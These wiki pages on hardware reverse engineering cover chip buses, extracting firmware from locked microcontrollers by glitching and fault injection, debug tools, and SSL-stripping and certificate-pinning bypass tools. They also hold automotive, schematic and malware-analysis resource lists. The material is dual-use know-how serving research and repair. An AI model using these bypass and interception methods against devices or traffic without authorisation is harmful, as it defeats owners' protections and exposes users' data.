::- '''White hats''' - good guys, safeguarding systems & data to prevent hackers from getting in.
::- '''Grey hats''' - in between good and bad.
::- '''Black hats''' - abusing vulnerabilities to earn money or do damage, or other illicit services.
:* '''Industrial hardware repair'''
::- Repair shops
::- Technical department in a company doing repairs locally
:* '''Recovery in mission critical failure mode (back-up a day keeps the Dr away)'''
::- Data recovery companies

====Physical locations====
:* Chip Internal ROM (embedded inside the microcontroller most often also known as a '''SoC''' system-on-a-chip)
:* Chip external ROM (an external part on the PCB)

====Types of Memory====
:* Various types of EEPROMs
::* Serial EEPROM
::* Parallel EEPROM
::* Flash Memory -> Bigger, faster and cheaper but less reliable (less write cycles)
::* NAND/NOR Flash
::* FeRAM

====Chip interfaces====
: Also known as general-purpose ports (GPIO).
:* [https://en.wikipedia.org/wiki/Bit_banging Bit-Banging]
::- Bit-banging is the process of emulating a protocol in software instead of relying on a hardware peripheral to do the same things.
:* [https://en.wikipedia.org/wiki/I2C I2C]
::- I2C is a two-wire serial communication protocol using a serial data line (SDA) and a serial clock line (SCL).
::: The protocol supports multiple target devices on a communication bus and can also support multiple controllers that send and receive commands and data.
:::: '''Pinout'''
:::: VCC (1.5V up to 5V)
:::: SCL (I2C Clock)
:::: SDA (I2C Data)
:::: GND (Ground)
:* [https://en.wikipedia.org/wiki/Serial_Peripheral_Interface SPI]
::- SPI is a synchronous, full duplex main-subnode-based interface.
::: The data from the main or the subnode is synchronized on the rising or falling clock edge. Both main and subnode can transmit data at the same time.
::: The SPI interface can be either 3-wire (Single SPI mode), 4-wire (Dual SPI mode) or 6-wire (Quad SPI mode).
:::: '''Pinout Dual SPI mode'''
:::: MOSI (Master Out Slave In)
:::: MISO (Master In Slave Out)
:::: SCLK (Serial Clock)
:::: SS/CS (Slave Select)
:* [https://en.wikipedia.org/wiki/Parallel_Peripheral_Interface Parallel Interface]
::- A parallel I/O port is a mechanism that allows the software to interact with external devices. It is called parallel because multiple signals can be accessed all at once.
:* [https://en.wikipedia.org/wiki/Serial_Peripheral_Interface#Microwire Microwire]
::: Microwire, often spelled μWire, is essentially a predecessor of SPI and a trademark of National Semiconductor.
::: It's a strict subset of SPI: half-duplex, and using SPI mode 0. Microwire chips tend to need slower clock rates than newer SPI versions; perhaps 2 MHz vs. 20 MHz.
::: Some Microwire chips also support a three-wire mode.
:* [https://en.wikipedia.org/wiki/Serial_Peripheral_Interface#Intelligent_SPI_controllers QSPI - Intelligent SPI controllers]
::- The QSPI peripheral provides support for communicating with an external flash memory device using SPI.
:* [https://en.wikipedia.org/wiki/1-Wire One-Wire]
::- 1-Wire is a wired half-duplex serial bus designed by Dallas Semiconductor that provides low-speed (16.3 kbit/s) data communication and supply voltage over a single conductor.
::: '''[Example]''' Genuine Dell laptop power supplies use the 1-Wire protocol to transmit data over the third wire to the laptop's embedded controller, providing information about power, current, and voltage ratings.
::: The embedded controller then verifies that a compatible power supply is connected, allowing all VRM phases to operate at maximum duty cycle.
::: Emulating the [https://github.com/orgua/OneWireHub/blob/main/examples/DS2502_DELLCHG/DS2502_DELLCHG.ino DS2502 TO-92-3 1-wire Dell charger ID EEPROM.]

=====Programming=====
::* In-circuit programming
:::: Allows programmable devices, such as microcontrollers, to be programmed while they are installed in a complete system, facilitating firmware updates without removing the chip.
::* Out-of-circuit programming
:::: Refers to the process of programming microcontrollers or integrated circuits while they are removed from their final application circuit, typically using specialized programming equipment.

====Extraction Methods [ >> hot topic << ]====

=====External ROM=====
: In case of an external ROM you can always try to read it with a programmer and try to dump the contents this way for later static analysis.

=====Internal ROM=====
When your target chip has a built-in ROM and the chip is locked you are out of luck trying to easily read the firmware in most cases. 
Here is where it comes handy to know of different methods widely used to attack these chips in order to retrieve the firmware for later static analysis or even live debugging.

::* 1. Decapsulation
:::- [https://www.youtube.com/watch?v=T1rRgb9N9s4 '''RECESSIM video:''' Nitric Acid and Microscopes. Decapsulating IC's.]
::* 2. Bootloader hacking
:::;- [https://0xinfection.github.io/reversing/reversing-for-everyone.pdf Great resources on reverse engineering]
::* 3. Fault injection & Glitching Attacks
:::;- VCC glitching (Crowbar Circuits)
::::: [https://www.youtube.com/watch?v=IOD5voFTAz8 '''RECESSIM video:''' Hacking into a Locked Microchip - Reverse Engineer shows you how it's done.]
::::: [https://eprint.iacr.org/2016/810.pdf Example paper 1. Fault Injection using Crowbars on Embedded Systems.]
::::: [https://arxiv.org/pdf/1903.08102 Example paper 2. Injecting Software Vulnerabilities with Voltage Glitching.]
::::: [https://cardis.org/cardis2013/proceedings/CARDIS2013_16.pdf Example paper 3. Glitch it if you can: parameter search strategies for successful fault injection.]
::::: [https://www.researchgate.net/publication/353922465_The_Forgotten_Threat_of_Voltage_Glitching_A_Case_Study_on_Nvidia_Tegra_X2_SoCs Example paper 4. The Forgotten Threat of Voltage Glitching: A Case Study on Nvidia Tegra X2 SoCs]
::::: [https://www.aisec.fraunhofer.de/en/FirmwareProtection.html Example paper 5. Using Optical Fault Injection and Race Conditions to Bypass STM32F0 Series Debug Interface Protections]
:::::- [https://github.com/racerxdl/stm32f0-pico-dump RPi Pico Implementation Exploiting Race Conditions to Iteratively Read Firmware]
:::;- Clock glitching (Oscillator Circuits)
::::: [https://caslab.io/publications/durand2021ultra.pdf Example paper 1. Ultra Freezing Attacks and Clock Glitching of Clock Oscillator Circuits]
::::: [https://scispace.com/pdf/high-speed-clock-glitching-bscq4pp5j1.pdf Example paper 2. High Speed Clock Glitching]
::::: [https://machiry.github.io/files/glitchresistor.pdf Example paper 3. Glitching Demystified: Analyzing Control-flow-based Glitching Attacks and Defenses]
::::: [https://eprint.iacr.org/2023/1647.pdf Example paper 4. Attacking Glitch Detection Circuits]
::::: [https://eprint.iacr.org/2024/1939.pdf Example paper 5. Machine Learning-Based Detection of Glitch Attacks in Clock Signal Data]
:::;- EMFI (Electromagnetic Fault Injection)
::::: [https://pure.tue.nl/ws/files/46956556/770549-1.pdf Example paper 1. Electromagnetic fault injection using transient pulse injections a comparison of EM-FI and optical-FI on smart cards]
::::: [https://www.os3.nl/_media/2011-2012/courses/rp2/p19_report.pdf Example paper 2. Electro Magnetic Fault Injection]
::::: [https://essay.utwente.nl/65596/1/Hummel_ComputerScienceMsc_EECMS.pdf Example paper 3. Exploring Effects of Electromagnetic Fault Injection on a 32-bit High Speed Embedded Device Microprocessor]
::::: [https://hal-lirmm.ccsd.cnrs.fr/lirmm-01430913v1/file/Electromagnetic-fault-injection-the-curse-of-flip.pdf Example paper 4. Electromagnetic fault injection: the curse of flip-flops]
::* 4. Scanning Electron Microscopy (SEM)
:::;- An expensive method.
:::: [https://www.researchgate.net/figure/a-E-beam-applied-to-the-chip-and-voltage-contrast-image-created-from-the-reflected_fig3_336651339 ResearchGate - FinFET architecture under a E-beam (SEM).]
::* Public Fault Injection Toolkits
:::;- [https://github.com/newaetech/chipwhisperer ChipWhisperer]
:::;- [https://github.com/newaetech/chipshouter-picoemp PicoEMP]

======Atmel SAM4C32 Glitching (Crowbar Circuit)======
: > [[:ATSAM4C32|Full in-depth wiki page can be found here.]]

: Atmel SAM4C32 reset low period during early start-up process somewhere in the bootloader showing vulnerable time for glitch. 
: After glitching the chip, JTAG comes online serving a command prompt which allows to dump the firmware of the chip protected by Atmel's Security Bit Feature called GPNVM. 
: [[File:Atmel SAM4 series glitch.png|none|thumb|Atmel SAM4C32 glitching. Yellow VDDCORE, Purple RST..]]
: Credits to [https://www.0x01team.com/hw_security/bypassing-microchip-atmel-sam-e70-s70-v70-v71-security/ 0x01 Team] and [https://www.youtube.com/watch?v=IOD5voFTAz8 RECESSIM] for finding the reset low period being connected to the glitch timebase.

====Debugging====
=====Debugging Hardware / Tools=====
::* Tools that are used to find debug ports, OCD interfaces, serial port I/O.
::;- [https://github.com/openocd-org/openocd OpenOCD (Open On-Chip Debugger)]
::;- [https://www.picotech.com/products/oscilloscope PicoScope. The modern alternative to the traditional benchtop oscilloscope.]
::;- [https://buspirate.com/ BusPirate - universal bus interface device for I2C and SPI.]
::;- [https://github.com/travisgoodspeed/goodfet GoodFET JTAG adapter]
::;- [https://mouser.com/new/segger/seggerjlink/ J-Link In-Circuit Debugger]
::;- [https://github.com/grandideastudio/jtagulator JTAGulator is an open source hardware tool that assists in identifying OCD interfaces from test points, vias, component pads, or connectors on a target device.]

=====Logic Analyzer=====
:: [https://hardwear.io/netherlands-2024/speakers/sasha-sheremetov.php hardwear.io - Hacking NAND Memory Pinout using Logic Analyzer.]
:: '''Abstract:'''
:: This presentation is about analysis of technological pinout of NAND memory in such devices as microSD, eMMC and other monolithic chips using a logic analyzer.
:: YouTube video: https://www.youtube.com/watch?v=sgl9Sfu79Lc

====Non-intrusive methods====
=====[Vector] Factory debug / programming ports=====
::* JTAG (primarily used for testing and debugging electronic circuits)
:::- Finding a unpopulated or populated JTAG port on the PCB.
::* UART (an asynchronous serial communication protocol that transmits data)
:::* TTL
::::: TTL defines voltage levels in digital logic circuits
:::::* [https://en.wikipedia.org/wiki/Level_shifter Level shifters]
=====[Vector] Network based [over-the-air (OTA) programming]=====
::* Network stack - > WLAN / BT firmware bugs (OSI layer 1. physical)
::::- Example 1. Broadcom Wi-Fi SoC remote heap overflow [https://www.exploit-db.com/exploits/41805 CVE 2017-0561]
::::- Example 2. Qualcomm Wi-Fi stack based buffer overflow [https://app.opencve.io/cve/CVE-2022-33279 CVE-2022-33279]
::::- Example 3. node-bluetooth remote buffer overflow [https://github.com/advisories/GHSA-cxx3-36qc-m6qm CVE-2023-26110]
::* Network stack - > Promiscuous mode eavesdropping
:::: Promiscuous mode eavesdropping is needed to audit software code because it allows the monitoring of all network traffic, enabling auditors to detect
:::: unauthorized data access and vulnerabilities that may not be visible through standard monitoring methods.
:::; <pre style="font-weight: normal;">Promiscuous mode eavesdropping is a network monitoring technique where a network interface card (NIC) captures all packets on the network segment, regardless of their destination address. This allows authorized or unauthorized users to intercept sensitive data transmitted over the network.</pre>
::* Network stack - > MiTM (Man-in-the-middle) methods
:::;- SSL stripping
::::: '''Mitmproxy''' is your swiss-army knife for debugging, testing, privacy measurements, and penetration testing.
:::::: [https://mitmproxy.org/ Click here for more details.]
::::: '''Exploitation of Trust''' by OSI layer 7 local client modifications to do '''cert pinning''' (local pentesting).
:::::: Github example [https://github.com/Fuzion24/JustTrustMe/blob/master/app/src/main/java/just/trust/me/Main.java click here.]
::* Local - > Cryptographic checksums
:::: A cryptographic checksum is a mathematical value generated by a cryptographic algorithm to verify the integrity of data, ensuring that it has not been altered during transmission or storage.
:::; <pre style="font-weight: normal;">Not only are OTA updates after being downloaded over TCP+TLS by a device cryptographically checked to make sure the authenticity and integrity is accounted for, if this was not the case it could install a malicious update or simply brick million of devices. TCP already ensures data integrity through checksums and error detection mechanisms so by adding even more checks it's redundance is high.</pre>
::* Local - > Signed updates
:::: A cryptographic signed package is a digital package that includes a cryptographic signature, ensuring the package’s authenticity, integrity, and origin from a trusted entity.
:::: This signature verifies that the package has not been altered since it was signed.
:::; <pre style="font-weight: normal;">Signing an OTA update package involves applying a digital signature using cryptographic methods. This process serves several critical purposes. 1. Authenticity. 2. Integrity.</pre>

====Programmers / Flash Utilities & Nand Flash Controllers ====
=====Programmers=====
======SOP16 / 8 / VSOP8 / WSON8 / PDIP8 / SO8 / TSSOP8 / UFDFPN8======
:: ➤ CH341A programmer
:::;- [https://www.onetransistor.eu/2017/08/ch341a-mini-programmer-schematic.html CH341A Mini Programmer Schematic and Drivers blogpost.]
:: ➤ XGECU T48 TL866 II Plus
:::;- Budget friendly high speed 30mhz programmer supports a wide range of chips (EEPROM/Flash/MCU/BIOS/SPI/NOR/NAND/EMMC) including high-capacity nand (up to 256gb). Adjustable VCC/VPP voltages (1.8-6.5v up to 25v), logic testing and pin diagnostics. Broad OS support from Win XP to Win11.
=====Flash Utilities=====
:: ➤ flashrom (Support: SPI/BIOS/EC)
:::;- [https://github.com/flashrom/flashrom flashrom] - is a utility for identifying, reading, writing, verifying and erasing flash chips. It is designed to flash BIOS/EFI/coreboot/firmware/optionROM images on mainboards, network/graphics/storage controller cards, and various other programmer devices.

=====Nand Flash Controllers=====
Listing of nand flash controller interface chips & off the shelf hardware (cheap stuff). 
Since the search engine is broken @ the usual suspects: DHgate, Gearbest, Banggood, Aliexpress or various other China stores. I use a search query for example '''“TSOP48 usb pcb controller flash disk site:aliexpress.com”''' in image search mode.
======BGA-153======
:: ➤ ['''UFS'''] JMicron JMS901 USB 3 (single channel nand supported)
:: ➤ ['''eMMC'''] Alcor Micro AU6438 USB 2.0 (single channel nand supported)

======TSOP48 ======
:: ➤ Innostor IS917 [https://flash-extractor.com/library/IS/IS917/ click here for details (Flash-extractor library)]
:: ➤ Silicon Motion Sm3281n [https://flash-extractor.com/library/SM/SM3281/SM3281N%20BB__2c_a4_08_32__1x8 click here for details (Flash-extractor library)]
:: ➤ Chipsbank CBM2099E [https://flash-extractor.com/library/CBM/CBM2099/ click here for details (Flash-extractor library)]

=====Nand Controller firmwares & datasheets=====
USBDev.ru is a great resource.

:: [https://www.usbdev.ru/files/ usbdev.ru/files/]
:: [https://www.usbdev.ru/databases/ usbdev.ru/databases/]

====The final chapter ====
Analyzing dumped data. You might also find the [[Software_Tools#|software category interesting.]]
::* Analyzing & unpacking firmware blobs
:::;- [https://github.com/onekey-sec/unblob Unblob]
:::;- [https://github.com/ReFirmLabs/binwalk Binwalk]
:::;- [https://github.com/gchq/CyberChef CyberChef]
:::;- [https://github.com/BinaryResearch/centrifuge-toolkit Centrifuge]
:::;- [https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Tools (FAT)]
:::;- [https://github.com/fkie-cad/FACT_core FACT (Firmware Analysis and Comparison Tool)]

::* Disassemblers
:::;- [[Software_Tools#Interactive_Disassemblers_.28static_analysis.29|Interactive Disassemblers (static analysis)]]

Automotive

2026-04-01T15:10:12Z

Polymorphic7: CAr/Truck navigation system added in dev index + TomTom Bridge (4FI70).

[[File:Jeep Fuses.jpg|thumb|Fuse box in a Jeep Wrangler]]
Everything related to reverse engineering automobiles, motorcycles or anything similar.
==Device Index==

===On Vehicle Targets===
[[Yamaha EBike Battery Dongle]] - A way to use Homemade and Third party batteries on a E-Bike that requires communication to be able to turn on.

[[Zadi E-Lock system]] - Motorcycle Key, lock and immobilizer system.

===Aftermarket Parts or Accessories===
[[Parking_Pilot]]

[[Starcom Helios]] - GPS/GSM vehicle tracking device (fleet management)

[https://www.bobadams5.com/posts/yadadashcam/ Yada 720P Roadcam Dashcam]

===Car and Truck GPS Navigator systems===
[https://wiki.recessim.com/view/TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70) TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)]

===Cluster Swap / Modification===
[https://wiki.recessim.com/view/Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod Cluster Wiring Mod Toyota Paseo L17 GT in P9 Starlet]

==Automotive Communication Interfaces==
Automotive electronics often communicate with protocols that are not common to other industries. Examples of automotive communication protocols include [[CAN]], [[LIN]], [[SENT]], and [[Ethernet]]

===ECU Tuning, Repair & Reverse engineering communities / forums===

*[https://carmasters.org/ CarMasters] - is a Russian‑language online forum dedicated to diagnosing, repairing, and discussing auto electronics and electromechanics across a wide range of car brand.
*[http://carcd.ru/forum/ CarCD] - is a Russian-language online community focused on automotive diagnostics, ECU tuning, repair tools, software sharing, and technical discussions for car electronics and chip tuning enthusiasts.
*[https://www.digital-kaos.co.uk/forums/ Digital Kaos] – is a broad tech forum with a strong auto diagnostics and ECU programming section.
*[https://garageforum.org/ GarageForum] - is an English-language forum focused on automotive software, diagnostics, workshop manuals, hardware tools, and technical support for car electronics and tuning.
*[https://mhhauto.com/ MHH Auto] - is a membership‑based community for sharing and discussing automotive software, ECU/airbag/dash activation keys, workshop manuals, tuning tools, and technical resources for educational and experimental car electronics projects.

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-01T15:08:07Z

Polymorphic7: initial commit. Work in progress..

WIP.

Literature

2026-02-11T22:20:11Z

Polymorphic7: Enshitification update

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

====Paid sources (various fields)====
Most of the websites provide free service manuals and boardviews, '''but some unfortunately don't or have been PAYWALLED (badcaps.net as of 2026). '''

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search <--- Pay 2 download..

::[https://vinafix.com/ Vinafix] - Vinafix Electronics Repair Forum & Schematic Search <--- Pay 2 download..

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

